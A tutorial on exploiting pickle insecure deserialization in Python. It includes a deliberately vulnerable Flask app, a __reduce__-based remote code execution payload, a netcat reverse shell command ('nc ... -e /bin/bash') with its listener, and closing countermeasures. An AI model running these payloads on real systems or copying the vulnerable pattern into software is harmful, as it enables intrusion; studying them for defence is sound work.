Introduction
In this article, we will look at insecure deserialization in Python applications caused by improper use of the pickle module, which is the most commonly used way to serialize and deserialize objects in Python.
What exactly is Pickle?
According to the pickle documentation, the module implements binary protocols for serializing and deserializing Python objects. That is, given a Python object, pickle can convert it into a byte stream, and it can convert that byte stream back into a Python object.
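As a minimal sketch of that round trip, the snippet below pickles a plain dictionary and loads it back. The variable names and the sample data are made up for illustration.

```python
import pickle

# Hypothetical sample data; any picklable Python object would do.
record = {"name": "rex", "legs": 4, "tags": ["good", "boi"]}

# Object -> byte stream
blob = pickle.dumps(record)

# Byte stream -> a new, equal object
restored = pickle.loads(blob)

print(type(blob).__name__)
print(restored == record)
```

The loaded object is an equal copy of the original rather than the same object.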
Even though pickle is widely used, it is rarely used safely, which helps explain why insecure deserialization ranked 8th (A8) in the OWASP Top 10 web application security risks of 2017. Crafting a deserialization attack against a Python application that uses pickle in the backend takes some effort, but once successful it can lead to remote code execution, giving the attacker complete control over the system running the application. Exploitation is difficult because the exploit has to be crafted manually for each application, and off-the-shelf exploits do not work without carefully considered tweaks. As of now, there are not many reliable tools that can automatically discover and exploit this class of flaws.
Implementing pickle in a Python application
Before diving into exploitation, we need to understand how serialization and deserialization are done in a typical Python application.
We will start with a basic Python program and then create a simple website using Flask.
So, open your favorite text editor and create a file named pickled.py.
First we import pickle with "import pickle" and base64 with "import base64", then create a class named animals with a simple public string attribute, good_boi.
Now that we have a class set up, we can use pickle to serialize and deserialize it.
We create a byte dump of the class animals with pickle.dumps(animals) and store it in the variable serialized_str.
A raw byte string is awkward to transport over the network, so we encode it in base64 with base64.b64encode(serialized_str) and store the result in the variable encoded_serialized_str. Because bytes cannot be concatenated with the str type, we convert both serialized_str and encoded_serialized_str to strings before printing them.
Just as we serialized the object and encoded it to base64, on the receiving side we can decode the base64 string and then convert the byte stream back into the object to use it.
The complete program, pickled.py, would look like this:
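A minimal sketch of pickled.py, following the steps described above, might look like the following. The names animals, good_boi, serialized_str and encoded_serialized_str come from the text. The attribute value, the printed labels and the names decoded_str and restored are assumptions.

```python
import base64
import pickle


class animals:
    # A simple public string attribute; the value "dog" is an assumption.
    good_boi = "dog"


# Serialize the class into a byte string.
serialized_str = pickle.dumps(animals)

# Base64-encode the bytes so they can travel as plain text.
encoded_serialized_str = base64.b64encode(serialized_str)

# bytes cannot be concatenated with str, so convert before printing.
print("Serialized: " + str(serialized_str))
print("Encoded: " + str(encoded_serialized_str))

# Reverse the process: base64-decode, then unpickle.
decoded_str = base64.b64decode(encoded_serialized_str)
restored = pickle.loads(decoded_str)
print("Restored good_boi: " + restored.good_boi)
```

Note that pickle stores a class by reference (its module and name), not by value, so the byte stream here names the class rather than carrying the good_boi string itself.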
When we run this program, we get the following output:
Now we create a simple Flask web application named app.py, which takes the encoded serialized string from the user and returns the deserialized object. We will exploit this application in the next section.
app.py would look as follows:
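A minimal sketch of such an app.py is shown below. The route "/" and the query parameter name pickled are assumptions made for illustration, and the code is deliberately vulnerable.

```python
import base64
import pickle

from flask import Flask, request

app = Flask(__name__)


@app.route("/")
def index():
    # "pickled" is a hypothetical parameter name chosen for this sketch.
    encoded = request.args.get("pickled", "")
    if not encoded:
        return "Pass a base64-encoded pickle in the 'pickled' parameter\n"
    # VULNERABLE: attacker-controlled bytes go straight into pickle.loads.
    obj = pickle.loads(base64.b64decode(encoded))
    return str(obj) + "\n"
```

The single call to pickle.loads on request data is the whole flaw: whatever the byte stream instructs pickle to do happens inside the server process.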
This simple Flask application takes the serialized string from the GET request and deserializes it to return the object. We can run the application with a simple "flask run" command.
Now we can craft our exploit.
This simple Python script gives us a base64 string containing the serialized object for the list "I am batman".
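A sketch of such a script could look like this, assuming the list holds the three words as separate strings. The variable names are hypothetical.

```python
import base64
import pickle

# Assumed shape of the list; the text only names it "I am batman".
payload = ["I", "am", "batman"]

# Serialize, then base64-encode so the result can go into a URL or header.
encoded = base64.b64encode(pickle.dumps(payload))

# Printing bytes shows them as b'...'; the part between the quotes is the string to send.
print(encoded)
```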
Now we can copy the base64-encoded string and pass it to the Flask application via curl.
As you can see, by passing our custom serialized string, we made the Flask application deserialize and return an object that we control.
We can take advantage of this behaviour to get remote command execution on the system.
To get command execution, we can define the __reduce__ method on a class. It returns a callable together with a tuple of arguments, and pickle invokes that callable with those arguments when the object is deserialized.
Consider the following snippet:
Here, we serialize an object which will execute the "whoami" command when it is deserialized.
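A minimal sketch of such a payload generator follows. The class name Exploit and the variable encoded are hypothetical. The script only builds the payload and never loads it, so nothing is executed locally.

```python
import base64
import os
import pickle


class Exploit:
    def __reduce__(self):
        # Tell pickle to call os.system("whoami") when this object is loaded.
        return (os.system, ("whoami",))


# The byte stream contains a reference to os.system plus its argument,
# not the Exploit class itself.
encoded = base64.b64encode(pickle.dumps(Exploit()))
print(encoded)
```

Because the stream references only os.system and the command string, the target does not need the Exploit class to be defined for the payload to run.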
We can also replace the command with a reverse shell command, "nc 127.0.0.1 1337 -e /bin/bash", to get remote command execution.
First we set up a listener in another terminal window with netcat: "nc -nlvp 1337".
Then we modify the above script as follows to use the reverse shell command:
Then we run this script with "python exploit3.py" to get the string.
The string between the two quotes is what we need to pass to the vulnerable application to get remote code execution.
Once we execute the curl command with our exploit string, we can see a connection established from the system running the vulnerable application.
We can now execute commands in the terminal window where our netcat listener is running.
So, this is how improper deserialization with pickle in a Python application can be exploited to get remote command execution when user input is deserialized without any validation.
Countermeasures
As the pickle module is not secure, only trusted data should be unpickled; never pass user-supplied data to pickle.loads.
For increased security, integrity checks such as digital signatures should be performed on any serialized objects.
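One way such an integrity check could be sketched is with an HMAC, a keyed hash that stands in here for a full digital signature. The function names, the key value and the tag-then-data layout are all assumptions made for illustration. The key must stay on the server and never reach the client.

```python
import hashlib
import hmac
import pickle

# Hypothetical secret; in practice it would come from secure configuration.
SECRET_KEY = b"replace-with-a-real-secret"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for SHA-256


def sign(obj):
    """Pickle obj and prepend an HMAC-SHA256 tag over the pickled bytes."""
    data = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return tag + data


def verify_and_load(blob):
    """Unpickle only if the tag matches; raise ValueError otherwise."""
    tag, data = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    # compare_digest avoids leaking information through timing differences.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch, refusing to unpickle")
    return pickle.loads(data)
```

With this in place, a payload crafted by someone who does not know the key is rejected before pickle.loads ever sees it. The check proves only that the data came from a holder of the key, so it does not make unpickling data from an untrusted key holder safe.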
Most secure modern applications also use sandboxing to isolate code that deserializes data and run it in low-privileged environments.